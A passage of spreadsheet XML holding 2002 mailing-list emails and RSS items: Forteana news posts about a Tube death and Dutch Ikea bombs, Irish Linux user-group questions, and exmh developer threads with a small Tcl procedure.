    <t>Man killed 'trying to surf' on Tube train \nAnanova \nWednesday December 4, 2002 11:07 AM\nAn investigation has been launched into the death of a passenger who tried\nto "surf" on a Tube train.\nThe passenger, a man in his mid 20s, died in the incident at Chalk Farm\nstation on the Northern Line on Monday night.\nWitnesses have reported seeing the man trying to hang on to the train as it\nleft the north London station.\nThere is also a suggestion that he may have been waving at friends in the\ntrain.\nThe man died when he struck the wall at the beginning of the tunnel at the\nend of the platform.\n"We think he may have been trying to jump on to the side of the train. It's\nnot quite clear what happened," said a London Underground spokeswoman.\nThe incident was being investigated by both LU and British Transport Police,\nwho today described the death as "non-suspicious." \n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>To: zzzzteana@yahoogroups.com\nFrom: Dave Walsh &lt;dwalsh@blather.net&gt;\nDate: Wed, 04 Dec 2002 11:36:32 GMT</t>
  </si>
  <si>
    <t>Wed, 04 Dec 2002 11:36:32 GMT</t>
  </si>
  <si>
    <t>Dave Walsh &lt;dwalsh@blather.net&gt;</t>
  </si>
  <si>
    <t>[zzzzteana] Re: Bomb Ikea</t>
  </si>
  <si>
    <t>Tim Chapman writes:\n\n&gt; [URL]http://news.bbc.co.uk[/URL] \n&gt; \n&gt; Wednesday, 4 December, 2002, 08:52 GMT\n&gt; Bomber targets Dutch Ikea stores \n&gt; \n&gt; Police in the Netherlands are searching all 10 outlets of the Ikea furniture\n&gt; chain in the country, after finding bombs in two stores. \n&gt;\n \n\n"Like everyone else, I had become a\nslave to the IKEA nesting instinct.\nIf I saw something like clever coffee\ntable sin the shape of a yin and yang,\nI had to have it. I would flip through\ncatalogs and wonder, "What kind of dining\nset defines me as a person?" We used to\nread pornography. Now it was the Horchow\nCollection. I had it all. Even the glass\ndishes with tiny bubbles and imperfections,\nproof they were crafted by the honest,\nsimple, hard-working indigenous peoples of\nwherever."\n - Jack, Fight Club \n\n\nIn Fight Club, Tyler Durden destroys this nesting instinct by *bombing* \nJack's apartment. Hmmmm. \n\n\nWhere you going with this, Ikea boy?\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>http://news.bbc.co.uk http://docs.yahoo.com</t>
  </si>
  <si>
    <t>To: Carlos Luna &lt;carlos.luna@steorn.com&gt;\nFrom: Ken Guest &lt;ken@tuatha.org&gt;\nDate: Wed, 04 Dec 2002 11:22:22 +0000</t>
  </si>
  <si>
    <t>Wed, 04 Dec 2002 11:22:22 +0000</t>
  </si>
  <si>
    <t>Ken Guest &lt;ken@tuatha.org&gt;</t>
  </si>
  <si>
    <t>Carlos Luna &lt;carlos.luna@steorn.com&gt;</t>
  </si>
  <si>
    <t>Re: [ILUG] dual keyboards</t>
  </si>
  <si>
    <t>Carlos Luna wrote:\n\n&gt;Hi all.\n&gt;Does anyone know how to set up dual keyboards(one is actually a stand-alone\n&gt;keypad)?\n&gt;Both keyboards have PS/2 connections and I want the keypad to be plugged in\n&gt;as the primary input device.  Then if the other keyboard is plugged in, that\n&gt;should take over.\n&gt;Possible?  Any possible hacks?\n&gt;  \n&gt;\nget a 'keyboard switch' - I think even Viking Direct and Maplin stock them.\n\n&gt;  \n&gt;\n\n\n\n________________________________________________________________________\nThis email has been scanned for all viruses by the MessageLabs SkyScan\nservice. For more information on a proactive anti-virus service working\naround the clock, around the globe, visit [URL]http://www.messagelabs.com[/URL]\n________________________________________________________________________\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.messagelabs.com http://www.linux.ie</t>
  </si>
  <si>
    <t>To: zzzzteana &lt;zzzzteana@yahoogroups.com&gt;\nFrom: "Tim Chapman" &lt;timc@2ubh.com&gt;\nDate: Wed, 04 Dec 2002 11:09:15 +0000</t>
  </si>
  <si>
    <t>Wed, 04 Dec 2002 11:09:15 +0000</t>
  </si>
  <si>
    <t>[zzzzteana] Bomb Ikea</t>
  </si>
  <si>
    <t>[URL]http://news.bbc.co.uk[/URL]\n\nWednesday, 4 December, 2002, 08:52 GMT\nBomber targets Dutch Ikea stores\n\nPolice in the Netherlands are searching all 10 outlets of the Ikea furniture\nchain in the country, after finding bombs in two stores.\nThe devices were discovered in Amsterdam and Sliedrecht, near the port city\nof Rotterdam on Tuesday evening.\nThe Sliedrecht bomb exploded at a police station, injuring two policeman.\nPolice have also closed off a motorway section in the central city Utrecht,\nnear a third IKEA store where a suspicious package was found.\nNo information about the motive behind the attacks has been released.\n"We decided together with the police because of safety reasons that the\ncompany's stores in the Netherlands would be closed today," said Ikea\nspokeswoman Helen van Trearum.\n"We don't want to take any risks. We are taking this very seriously," she\nadded.\nIkea - a Swedish-based group - is one of the world's largest furniture\nretailers, with stores in more than 30 countries.\nMeanwhile, the Amsterdam head office of the Dutch news agency ANP was\nevacuated on Wednesday, after police warned that a bomb might have been\nplanted in the building.\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>To: zzzzteana@yahoogroups.com\nFrom: Dave Walsh &lt;dwalsh@blather.net&gt;\nDate: Wed, 04 Dec 2002 11:08:27 GMT</t>
  </si>
  <si>
    <t>Wed, 04 Dec 2002 11:08:27 GMT</t>
  </si>
  <si>
    <t>[zzzzteana] Re: By the way</t>
  </si>
  <si>
    <t>Joe McNally writes:\n\n&gt; What the hell is it with these mini remote control cars? Not only has \n&gt; my mailbox been full of spam advertising them, but there's a fairly \n&gt; large stall selling them at Paddington station.\n&gt; -- \n&gt;   Joe McNally :: Flaneur at Large :: [URL]http://www.flaneur.org.uk[/URL] \n&gt;\n\nAny chance you could bring a wire-cutters with you the next time you're \npassing through, and cut their 'net connection? \n\n\nHang on....mini - Mini... the the ETs have seen the Mini advert and have \ndecided to get revenge by invading in the form of spambots and small \n'remote' cars. These are the probes that some of the Saucerheads rattle on \nabout, probes that are fired into the atmosphere from the mama-ships. \n\nThanks Joe, there's an idea for a whacky blather issue here. \n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Padraig Brady &lt;padraig.brady@corvil.com&gt;\nDate: Wed, 04 Dec 2002 11:08:14 +0000</t>
  </si>
  <si>
    <t>Wed, 04 Dec 2002 11:08:14 +0000</t>
  </si>
  <si>
    <t>Re: [ILUG] PostgreSQL vs. MySQL</t>
  </si>
  <si>
    <t>Sean O'Donnell wrote:\n&gt; Doesnt answer your question, but theres a very simple reason i \n &gt; develop a lot on mysql, it runs on windows and linux, a lot of\n &gt; clients only have windows servers, and last time i checked\n &gt; you can only run postgresql on windows with a lot of fecking\n&gt; around with cygwin. give postgres a decent standalone windows \n &gt; build and i reckon you would see a lot of defections.\n\nThis is pertinent: [URL]http://lwn.net[/URL]\n\nPdraig.\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://lwn.net http://www.linux.ie</t>
  </si>
  <si>
    <t>To: Hal DeVore &lt;haldevore@acm.org&gt;\nFrom: Robert Elz &lt;kre@munnari.OZ.AU&gt;\nDate: Wed, 02 Oct 2002 23:54:44 +0700</t>
  </si>
  <si>
    <t>Wed, 02 Oct 2002 23:54:44 +0700</t>
  </si>
  <si>
    <t>Re: Another sequences window nit</t>
  </si>
  <si>
    <t>Date:        Wed, 02 Oct 2002 11:39:13 -0500     From:        Hal DeVore      Message-ID:  &lt;9288.1033576753@dimebox.bmc.com&gt;   | Restarting exmh was necessary. Probably not.   Next time try clicking on the folder name in the sequences window for the sequence.   That is, request that sequence be the one displayed in the FTOC.   If the sequence doesn't exist, it will be cleaned up then. Perhaps it would be nicer if flist would do it as well, but this is effective enough. kre _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: "" Angles " Puglisi" &lt;angles@aminvestments.com&gt;\nDate: Wed, 02 Oct 2002 19:35:48 +0000</t>
  </si>
  <si>
    <t>Wed, 02 Oct 2002 19:35:48 +0000</t>
  </si>
  <si>
    <t>Matthias Saou (matthias@egwn.net) wrote*: &gt;You're really better off backuping all placed where you know you've hand &gt;edited or installed some files. For me that's only /etc/, /root/ and &gt;/home/. Then you reinstall cleanly, formating "/", put your /home/ files &gt;back into place and you're ready to go. Matthias I gotta believe you, I've been using your RPMs for some time now :) That's the way I'll do it. A clean start but with the old configs at the ready for diff- ing when needed. I'll find some old HD for those media files. -- That's "angle" as in geometry. _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: 0xdeadbeef@petting-zoo.net\nFrom: gkm@petting-zoo.net (glen mccready)\nDate: Wed, 02 Oct 2002 19:06:58 -0700</t>
  </si>
  <si>
    <t>Wed, 02 Oct 2002 19:06:58 -0700</t>
  </si>
  <si>
    <t>gkm@petting-zoo.net (glen mccready)</t>
  </si>
  <si>
    <t>0xdeadbeef@petting-zoo.net</t>
  </si>
  <si>
    <t>New $199 PC Doesn't Do Windows</t>
  </si>
  <si>
    <t>Forwarded-by: Monty Solomon       New $199 PC Doesn't Do Windows      - Oct 2, 2002 03:53 PM (AP Online)      - [URL]http://finance.lycos.com[/URL] By MATTHEW FORDAHL AP Technology Writer      It's been about 20 years since a new Atari 400 or Commodore Vic 20 could be had for less than $200. Even then, those relics were well on their way from bargain bins to the dust bin of PC history.   Since then, few if any new computers have sold for less than $200. Any that did were seriously outdated or inoperable.   Now, in a challenge to established tech giants, several upstarts have banded together to create a PC that retails for $199.86.   It doesn't do Windows. In fact, it doesn't do a lot of things.   The Microtel SYSMAR710, sold only at Wal-Mart's online store, runs on a Linux operating system variant called Lindows, which has been hyped as a new choice for consumers who want to break away from the Microsoft monopoly. ...      - [URL]http://finance.lycos.com[/URL]</t>
  </si>
  <si>
    <t>http://finance.lycos.com http://finance.lycos.com</t>
  </si>
  <si>
    <t>To: exmh-workers@spamassassin.taint.org\nFrom: Hal DeVore &lt;haldevore@acm.org&gt;\nDate: Wed, 02 Oct 2002 18:00:53 -0500</t>
  </si>
  <si>
    <t>Wed, 02 Oct 2002 18:00:53 -0500</t>
  </si>
  <si>
    <t>Re: Working My_Mark2CurSeen</t>
  </si>
  <si>
    <t>[I wrote this last night but it appears I never sent it... still  haven't had time to dig in to it...] &gt;&gt;&gt;&gt;&gt; On Tue, 1 Oct 2002, "Robert" == Robert Elz wrote:   Robert&gt; No, but using PickMarkSeen (and pick(ids)) as an   Robert&gt; alternative to just doing   Robert&gt; Seq_Del $exmh(folder) $mhProfile(unseen-sequence) $results Ah.  Neither Ted nor I were particularly up to date.  I pulled  down the lates from CVS and am now running with it.  I miss the  blue ftoc lines but I'll sort that out soon, iirc Chris said  it's a simple resource change. Ted's code to "ketchup" made use of some of the procs that went  away in the sequence generalization.  I've fixed it up... almost  and it looks like this now: proc Cabeen_Mark2CurSeen {} {     global exmh mhProfile msg     set results {}     Exmh_Status "Clearing unseen up to cur..." red     Mh_SetCur $exmh(folder) $msg(id)     set unseen [Mh_Sequence $exmh(folder) $mhProfile(unseen-sequence) ]     foreach elem $unseen {          if { $elem &lt;= $msg(id) } {             lappend results $elem          }     }     busy Seq_Del $exmh(folder) $mhProfile(unseen-sequence) $results     Exmh_Status ok blue } The "almost" is because it's not updating the highlighting on  the ftoc.  I'm too tired to go figure out how to fix that just  now and have to move on to other stuff.  If someone wants to  forward me a clue feel free. Now that I've got all of Chris' sequence stuff I discovered that  my sequences are ... cluttered. --Hal _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Gregory Alan Bolcer &lt;gbolcer@endeavors.com&gt;\nDate: Wed, 02 Oct 2002 14:16:55 -0700</t>
  </si>
  <si>
    <t>Wed, 02 Oct 2002 14:16:55 -0700</t>
  </si>
  <si>
    <t>Re: Wifi query</t>
  </si>
  <si>
    <t>Elias Sinderson wrote:\n&gt; 802.11b - 11Mbps per channel over three channels in the 2.4GHz range \n&gt; (also shared with microwaves and cordless phones) \n\nMicrowaves, cordless phones and video-based baby monitors....\n\nGreg\n\n\n\n-- \nGregory Alan Bolcer, CTO  | work: +1.949.833.2800\ngbolcer at endeavors.com  | [URL]http://endeavors.com[/URL]\nEndeavors Technology, Inc.| cell: +1.714.928.5476</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Elias Sinderson &lt;elias@cse.ucsc.edu&gt;\nDate: Wed, 02 Oct 2002 11:40:38 -0700</t>
  </si>
  <si>
    <t>Wed, 02 Oct 2002 11:40:38 -0700</t>
  </si>
  <si>
    <t>802.11b - 11Mbps per channel over three channels in the 2.4GHz range \n(also shared with microwaves and cordless phones) at rages up to ~300 ft.\n802.11a runs on 12 channels in the 5GHz range and up to around five \ntimes more bandwidth (~54Mbps or so) but has less range (60-100 ft). \n8021.11a also adds Forward Error Correction into the scheme to allow for \nmore reliable data transmission.\nWhich to use really depends on what you're doing with it. Streaming \nvideo almost necessitates 802.11a, while streaming just audio can be \ncomfortably done with 802.11b provided that there isn't much \ninterference or too many clients.\nPrices? Don't know... Haven't done the research. For covering a large \narea 802.11a will be more expensive due to the need for more APs. If you \nwant to reach the local coffee shop, however, you will need a \ndirectional antenna either way.\n\nCheck out [URL]http://www.80211-planet.com[/URL], they've got some good articles on \n802.11... Also, some of the best info on 802.11 security I've seen can \nbe found at [URL]http://www.drizzle.com[/URL]\n\n\nGive me bandwidth or give me death,\nElias\n\n\nTom wrote:\n\n&gt;... I have one very pressing question.... Wifi ranges.. ...\n&gt;\n&gt;Do I got for 802.11b stuff or do I gold out for 802.11a ? Is the price\n&gt;point break goign to warrant the differnce?\n&gt;</t>
  </si>
  <si>
    <t>http://www.80211-planet.com http://www.drizzle.com</t>
  </si>
  <si>
    <t>To: "J. W. Ballantine" &lt;jwb@homer.att.com&gt;\nFrom: Valdis.Kletnieks@vt.edu\nDate: Wed, 02 Oct 2002 10:49:25 -0400</t>
  </si>
  <si>
    <t>Wed, 02 Oct 2002 10:49:25 -0400</t>
  </si>
  <si>
    <t>"J. W. Ballantine" &lt;jwb@homer.att.com&gt;</t>
  </si>
  <si>
    <t>Re: A couple of nits...</t>
  </si>
  <si>
    <t>--==_Exmh_-1581861840P Content-Type: text/plain; charset=us-ascii On Wed, 02 Oct 2002 09:54:04 EDT, "J. W. Ballantine"   said: &gt; First, when I try and run exmh with wish from tk8.4.0 it seems to take &gt; forever to start, but with wish from tk8.a.4 it starts in a snap. This sounds like something piggy in the 'flist' code - I'm seeing flist in general taking 5-10 seconds.  Interesting that a different wish comes up fast, there might be a borkedness in 8.4. &gt; Using the latest CVS, when I open exmh and the folder I'm in has unseen &gt; messages and I hit next, exmh changes to the next folder with unseen messages &gt; rather than to the first unseen in the current folder. Hmm.. weirdness.. &gt; Finally, when I reach the end of the messages in a folder and go on to &gt; the next unseen, exmh always goes back to inbox (which has no unseen &gt; messages) rather than the next folder with unseen messages.  (When I  &gt; goto next from inbox it does go where I would think it should go). I've been seeing this as well - *usually* with inbox, but it's gotten stuck on some other folders as well (I have procmail do rcvstore into folders for me). --  				Valdis Kletnieks 				Computer Systems Senior Engineer 				Virginia Tech --==_Exmh_-1581861840P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (GNU/Linux) Comment: Exmh version 2.5 07/13/2001 iD8DBQE9mwd0cC3lWbTT17ARAsOKAKCe3ziHYPQnWBGyUdYQzYurE1tguACfS9Ms TUQI8ndQ8stuJqaWVGSAi4k= =JBgX -----END PGP SIGNATURE----- --==_Exmh_-1581861840P-- _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: exmh-workers@spamassassin.taint.org\nFrom: "J. W. Ballantine" &lt;jwb@homer.att.com&gt;\nDate: Wed, 02 Oct 2002 09:54:04 -0400</t>
  </si>
  <si>
    <t>Wed, 02 Oct 2002 09:54:04 -0400</t>
  </si>
  <si>
    <t>A couple of nits...</t>
  </si>
  <si>
    <t>I have a couple of small issues, and I'm not sure if their exmh issues\nor my setup issues.\n\nFirst, when I try and run exmh with wish from tk8.4.0 it seems to take\nforever to start, but with wish from tk8.a.4 it starts in a snap.\n\nUsing the latest CVS, when I open exmh and the folder I'm in has unseen\nmessages and I hit next, exmh changes to the next folder with unseen messages\nrather than to the first unseen in the current folder.\n\nFinally, when I reach the end of the messages in a folder and go on to\nthe next unseen, exmh always goes back to inbox (which has no unseen\nmessages) rather than the next folder with unseen messages.  (When I \ngoto next from inbox it does go where I would think it should go).\n\nJust wanted to let you know what I'm seeing and find out if I'm expecting\nsome different than I should be.\n\nThanks for all the effort\n\nJim\n\n\n\n\n_______________________________________________\nExmh-workers mailing list\nExmh-workers@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: exmh-workers@spamassassin.taint.org\nFrom: Hal DeVore &lt;haldevore@acm.org&gt;\nDate: Wed, 02 Oct 2002 09:50:51 -0500</t>
  </si>
  <si>
    <t>Wed, 02 Oct 2002 09:50:51 -0500</t>
  </si>
  <si>
    <t>Re: Bindings problem with current CVS code</t>
  </si>
  <si>
    <t>&gt;&gt;&gt;&gt;&gt; On Wed, 2 Oct 2002, "Chris" == Chris Garrigues wrote:\n\n  Chris&gt; Flist_FindUnseen has changed to Flist_FindSeqs.\n\nI guess I was sleepier than I thought.  I managed to cut and\npaste the _right_ stuff from the app-defaults file into the\nBindings definition dialog without ever noticing that it was\ndifferent from what was in my exmhbindings file.\n\n--Hal\n\nP.S., can I get a pointer to a freeware Tcl/Tk debugger?\n\n\n\n\n_______________________________________________\nExmh-workers mailing list\nExmh-workers@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: Chris Garrigues &lt;cwg-dated-1033999132.9ba1d6@DeepEddy.Com&gt;\nFrom: Hal DeVore &lt;haldevore@acm.org&gt;\nDate: Wed, 02 Oct 2002 09:34:08 -0500</t>
  </si>
  <si>
    <t>Wed, 02 Oct 2002 09:34:08 -0500</t>
  </si>
  <si>
    <t>Chris Garrigues &lt;cwg-dated-1033999132.9ba1d6@DeepEddy.Com&gt;</t>
  </si>
  <si>
    <t>Re: Unseen window versus Sequences Window</t>
  </si>
  <si>
    <t>&gt;&gt;&gt;&gt;&gt; On Wed, 2 Oct 2002, "Chris" == Chris Garrigues wrote:\n\n  Chris&gt; I'm not sure I'll get to it any time soon.\n\nWell, you have a pretty good idea of when I might get to it (the \nphrase hell freezes over comes to mind)... so whenever you can \nwill certainly be fine.\n\nThanks for considering it.  In the meantime I've set the \n"minimum entry lines" to 1.  It certainly isn't going to make me \ngo back to the old version.\n\n--Hal\n\n\n\n\n_______________________________________________\nExmh-workers mailing list\nExmh-workers@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: Hal DeVore &lt;haldevore@acm.org&gt;\nFrom: Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;\nDate: Wed, 02 Oct 2002 08:58:51 -0500</t>
  </si>
  <si>
    <t>Wed, 02 Oct 2002 08:58:51 -0500</t>
  </si>
  <si>
    <t>--==_Exmh_-2113882517P Content-Type: text/plain; charset=us-ascii &gt; From:  Hal DeVore  &gt; Date:  Tue, 01 Oct 2002 23:21:21 -0500 &gt; &gt; One possibility that occurs to me would be a button or mouse &gt; click that "shrinks" the Sequences window to show only the &gt; sequences in the "always show" list.  And of course a way to  &gt; expand it back. That's a pretty good idea.  I'm not sure I'll get to it any time soon.  (I  already have a known bug reported on 9/25 that I haven't been able to get to.) Chris --  Chris Garrigues                 [URL]http://www.DeepEddy.Com[/URL] virCIO                          [URL]http://www.virCIO.Com[/URL] 716 Congress, Suite 200 Austin, TX  78701		+1 512 374 0500   World War III:  The Wrong-Doers Vs. the Evil-Doers. --==_Exmh_-2113882517P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Exmh version 2.2_20000822 06/23/2000 iD8DBQE9mvubK9b4h5R0IUIRAs2xAJ9gFx9Fvnld2Kp7JaUZyusroUweFQCfWPnM Pp78BfHf//xicipba00ru3o= =tDi6 -----END PGP SIGNATURE----- --==_Exmh_-2113882517P-- _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: Hal DeVore &lt;haldevore@acm.org&gt;\nFrom: Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;\nDate: Wed, 02 Oct 2002 08:56:27 -0500</t>
  </si>
  <si>
    <t>Wed, 02 Oct 2002 08:56:27 -0500</t>
  </si>
  <si>
    <t>--==_Exmh_-2120603942P Content-Type: text/plain; charset=us-ascii &gt; From:  Hal DeVore  &gt; Date:  Tue, 01 Oct 2002 23:22:14 -0500 &gt; &gt; I've had this binding in my ~/.exmh/exmhbindings for years: &gt;  &gt; set {bindings(key,Flist_FindUnseen 1 ; Inc_PresortFinish)}  &gt;  &gt; After updating to the current code in CVS I get "bad key f" when  &gt; I hit the "f" key.  I can open the Bindings... Commands window  &gt; and define the binding.  It then works until I restart exmh. &gt;  &gt; I suspect a parsing problem/change.  I'll try to look into this  &gt; tomorrow unless someone knows where the problem might be. Flist_FindUnseen has changed to Flist_FindSeqs.  It takes the same arguments,  but I changed the name because it looks for all the sequences, not just the  unseen sequence. Chris --  Chris Garrigues                 [URL]http://www.DeepEddy.Com[/URL] virCIO                          [URL]http://www.virCIO.Com[/URL] 716 Congress, Suite 200 Austin, TX  78701		+1 512 374 0500   World War III:  The Wrong-Doers Vs. the Evil-Doers. --==_Exmh_-2120603942P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Exmh version 2.2_20000822 06/23/2000 iD8DBQE9mvsKK9b4h5R0IUIRAsiQAJ9cQeGocfBt4zgFi0J3kLd5f6a+NACffh/N rngnJZnZ5eU67ZIqlLGmC2w= =BCEQ -----END PGP SIGNATURE----- --==_Exmh_-2120603942P-- _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: newscientist &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 02 Oct 2002 08:03:08 -0000</t>
  </si>
  <si>
    <t>Wed, 02 Oct 2002 08:03:08 -0000</t>
  </si>
  <si>
    <t>Food 'cancer chemical' reaction identified</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8435176,1440/\nDate: Not supplied\n\nThe reaction that forms the potential carcinogen acrylamide in baked foods is \nrevealed, suggesting ways of reducing levels</t>
  </si>
  <si>
    <t>New P2P network funded by US government</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8437307,1440/\nDate: Not supplied\n\nThe new network aims to thwart hackers and beat technical problems that make \nsuch networks slow or unreliable</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: newscientist &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 02 Oct 2002 08:03:06 -0000</t>
  </si>
  <si>
    <t>Wed, 02 Oct 2002 08:03:06 -0000</t>
  </si>
  <si>
    <t>Viruses that also hack computers on the rise</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8443955,1440/\nDate: Not supplied\n\nA new internet worm marks a worrying crossover between virus writing and \nhacking, say experts</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: newscientist &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 02 Oct 2002 08:03:05 -0000</t>
  </si>
  <si>
    <t>Wed, 02 Oct 2002 08:03:05 -0000</t>
  </si>
  <si>
    <t>Patients to get chemically "sterilised" blood</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8443954,1440/\nDate: Not supplied\n\nHundreds of US transfusion patients are set to receive red blood cells cleaned \nwith compounds that inactivate viruses and bacteria</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: zawodny &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 02 Oct 2002 08:03:03 -0000</t>
  </si>
  <si>
    <t>Wed, 02 Oct 2002 08:03:03 -0000</t>
  </si>
  <si>
    <t>zawodny &lt;rssfeeds@spamassassin.taint.org&gt;</t>
  </si>
  <si>
    <t>RedHat 8.0 ISO Mirror(s)</t>
  </si>
  <si>
    <t>URL: [URL]http://jeremy.zawodny.com[/URL]\nDate: 2002-10-01T06:31:54-08:00\n\nThanks to an anonymous helper, I've mirrored all 5 ISO images for Red Hat 8.0. \nOhio - [URL]http://family.zawodny.com[/URL] (DS-3 connection via \nSprint) California - [URL]http://litterbox.zawodny.com[/URL] (multiple \ngigabit connections) Now be nice. :-)...</t>
  </si>
  <si>
    <t>http://jeremy.zawodny.com http://family.zawodny.com http://litterbox.zawodny.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: zawodny &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 02 Oct 2002 08:03:00 -0000</t>
  </si>
  <si>
    <t>Wed, 02 Oct 2002 08:03:00 -0000</t>
  </si>
  <si>
    <t>Toward Mac OS XX</t>
  </si>
  <si>
    <t>URL: [URL]http://jeremy.zawodny.com[/URL]\nDate: 2002-10-01T10:22:46-08:00\n\nDavid Pogue is talking about Mac in the past, present, and future. Mac market \nis growing. It's a small part of a very large and growing pie. So Apple isn't \ndead and won't die. But they'll never be the big...</t>
  </si>
  <si>
    <t>http://jeremy.zawodny.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: zawodny &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 02 Oct 2002 08:02:59 -0000</t>
  </si>
  <si>
    <t>Wed, 02 Oct 2002 08:02:59 -0000</t>
  </si>
  <si>
    <t>OSXCon Thoughts for Tuesday</t>
  </si>
  <si>
    <t>URL: [URL]http://jeremy.zawodny.com[/URL]\nDate: 2002-10-01T13:29:57-08:00\n\nI had to leave the conference after the first half of the day so that I can get \nsome stuff done at work and some work on the book. David Pogue's keynote was \nexcellent. He knows the Mac, Apple history,...</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: zawodny &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 02 Oct 2002 08:02:54 -0000</t>
  </si>
  <si>
    <t>Wed, 02 Oct 2002 08:02:54 -0000</t>
  </si>
  <si>
    <t>Drivezilla -- 200GB Drives from Western Digital</t>
  </si>
  <si>
    <t>URL: [URL]http://jeremy.zawodny.com[/URL]\nDate: 2002-10-01T15:24:02-08:00\n\nWow. Check out Western Digital's Drivezilla. They've announced 200GB hard \ndisks. Something tells me that I'll have my own terabyte by the end of 2003....</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: guardian &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 02 Oct 2002 08:02:51 -0000</t>
  </si>
  <si>
    <t>Wed, 02 Oct 2002 08:02:51 -0000</t>
  </si>
  <si>
    <t>The Office: too painful to watch?</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8428489,215/\nDate: 2002-10-01T11:41:00+01:00\n\n*Talk:* Join the discussion on the web's liveliest talkboards.</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: guardian &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 02 Oct 2002 08:02:50 -0000</t>
  </si>
  <si>
    <t>Wed, 02 Oct 2002 08:02:50 -0000</t>
  </si>
  <si>
    <t>Education debate</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8430044,215/\nDate: 2002-10-01T12:41:57+01:00\n\n*Live online:* The Observer's *Tracy McVeigh* and experts *Tim Brighouse* and *\nAnn Hodgson* will be here on Thursday at 3pm to discuss the government's \nrecord. Post your questions now.</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: guardian &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 02 Oct 2002 08:02:49 -0000</t>
  </si>
  <si>
    <t>Wed, 02 Oct 2002 08:02:49 -0000</t>
  </si>
  <si>
    <t>Nationwide predicts 23% house price rise</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8457387,215/\nDate: 2002-10-02T04:57:55+01:00\n\n*Money:* Britain's biggest building society has signalled it expects no let-up \nin the runaway property boom.</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: guardian &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Wed, 02 Oct 2002 08:02:46 -0000</t>
  </si>
  <si>
    <t>Wed, 02 Oct 2002 08:02:46 -0000</t>
  </si>
  <si>
    <t>Senators threaten to rein in Bush</t>
  </si>
  <si>
